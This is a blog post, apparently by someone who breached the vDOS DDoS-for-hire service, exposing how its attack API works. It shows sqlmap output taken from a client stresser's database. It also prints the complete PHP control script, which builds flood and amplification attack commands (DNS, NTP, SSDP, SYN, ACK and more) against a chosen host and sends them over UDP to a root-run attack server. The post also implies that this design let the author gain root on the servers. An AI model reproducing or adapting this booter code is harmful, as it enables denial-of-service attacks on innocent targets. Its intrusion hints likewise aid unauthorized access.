PHP on api.vdos-s.com

There was a separate leak some time ago so it has been known that PoodleStresser used vDOS. This is what my sqlmap found on PoodleStresser:

Table: servers
[6 columns]
+—————-+————–+
| Column         | Type         |
+—————-+————–+
| AllowedMethods | varchar(255) |
| Concurrents    | int(11)      |
| ID             | int(255)     |
| name           | varchar(255) |
| SendURL        | varchar(255) |
| StopURL        | varchar(255) |
+—————-+————–+

| 6  | Alpha | http://api.vdos-s.com/bigpein.php?host=%5Bhost%5D&port=%5Bport%5D&time=%5Btime%5D&method=%5Bmethod%5D&serverid=0&6667 | http://api.vdos-s.com/bigpein.php?host=%5Bhost%5D&port=%5Bport%5D&time=%5Btime%5D&method=%5Bmethod%5D&serverid=0&action=stop&6667 | 999999      | dns;xsyn;ssyn;fin;rst;ack;icmp;dominate;tcpamp |

This is the bigpein.php script

<?php
set_time_limit(0);
ignore_user_abort(true);
if($_SERVER[‘REMOTE_ADDR’] != “109.236.92.157” && $_SERVER[‘REMOTE_ADDR’] != “188.166.71.10”) die();
if (ctype_digit($_GET[‘time’]) && ctype_digit($_GET[‘port’]) && isset($_GET[‘6667’]) && preg_match(‘/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/’,$_GET[‘host’], $match) && filter_input(INPUT_GET, ‘port’, FILTER_VALIDATE_INT) && filter_input(INPUT_GET, ‘time’, FILTER_VALIDATE_INT)){
if($_GET[‘action’] !=”stop”) $action = “start”; else $action = “stop”;
$ip = $match[0];
$port = $_GET[‘port’];
$time = $_GET[‘time’];
$method = $_GET[‘method’];
}else{
die(‘nice try tho lulz’);
}
function get_threads($time,$host){
if(strpos($host,”109.163.224″)!==FALSE){
return 20;
}elseif(strpos($host,”24.27.236″)!==FALSE){
return 8;
}elseif($host== “195.154.109.173” || $host == ‘195.154.104.15’){
return 14;
}elseif($time < 250){
return 7;
}elseif($time < 500){
return 6;
}elseif($time < 1000){
return 5;
}elseif($time < 2500){
return 4;
}else{
return 3;
}
}
function get_command($host,$port,$time,$method,$action){
$methods = array(
‘dns’ => ‘./dns [host] [port] dns_amp.txt [threads] [time]’,
‘ovh’ => ‘./ovh [host] [port] ovhlist.txt [threads] [time]’,
‘nbs’ => ‘./NBSattack [host] [port] nbs_amp.txt [threads] [time]’,
‘ssyn’=>’./essyn [host] [port] 4 700000 [time]’,
‘ssdp’=>’./ssdp [host] [port] ssdp_amp.txt [threads] [time]’,
‘ntp’=> ‘./ntp [host] [port] ntp_amp.txt [threads] 700000 [time]’,
‘home’ => ‘./dns [host] [port] dns_amp.txt 1 [time]’,
‘xsyn’=> ‘./xsyn [host] [port] 4 700000 [time]’,
‘fin’ => ‘./stcp [host] [port] 4 700000 [time] fin’,
‘rst’ => ‘./stcp [host] [port] 4 700000 [time] rst’,
‘ack’ => ‘./stcp [host] [port] 4 700000 [time] ack’,
‘ts3’ => ‘./ts3 [host] [port] ts3_amp.txt [threads] [time]’,
‘quake’ => ‘./quake [host] [port] quake_amp.txt [threads] [time]’,
‘icmp’ => ‘./trig -I -h [host] -p [port],[port] -t [time] -l 15’,
‘nflag’ => ‘./idk -N -h [host] -p [port],[port] -t [time] -l 70’,
‘dominate’ => ‘./dominate [host] [port] [threads] -1 [time]’,
‘vse’ => ‘./vse [host] [port] [threads] [time]’,
‘snmp’ => ‘./snmp [host] [port] snmp_amp.txt [threads] [time]’,
‘trig’ => ‘./trig -h [host] -U -t [time] -l 15’,
‘rip’=> ‘./rip [host] [port] rip.txt [threads] 700000 [time]’,
‘tcpamp’=> ‘./tcp [host] [port] tcp_amp.txt 5 [time]’,
‘portmap’=> ‘./portmap [host] [port] portmap.txt [threads] 700000 [time]’
);
if(array_key_exists($method, $methods)){
$find = array(‘[host]’, ‘[port]’, ‘[time]’,'[threads]’);
$replace = array($host, $port, $time, get_threads($time,$host));
$cmd = str_replace($find, $replace, $methods[$method]);
if($action == “start”){
$command = “screen -dm “.$cmd;
}elseif($action==”stop”){
$command = “pkill -f ‘”.$cmd.”‘”;
}
}
return $command;
}
$servers = array(‘82.118.233.4’);
$server_ip   = $servers[$_GET[‘serverid’]];
$server_port = 13371;
if ($socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP)) {
$command = get_command($ip,$port,$time,$method,$action);
socket_sendto($socket, $command, strlen($command), 0, $server_ip, $server_port);
print “sent”;
} else {
print(“can’t create socket”);
}

?>

They actually send shell commands in UDP packets. In this case only to one attack server (the corresponding script for vdos-s.com, index.php, has 8 of them). The attack servers execute what is in the UDP packets. As root.

The most advanced cyber gurus might already get an idea of how I rooted them. Yes, it wasn’t exactly Fort Knox.

I wouldn’t advice the Israel army to recruit these guys to an “elite intelligence unit”. But do they have a clown unit?

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s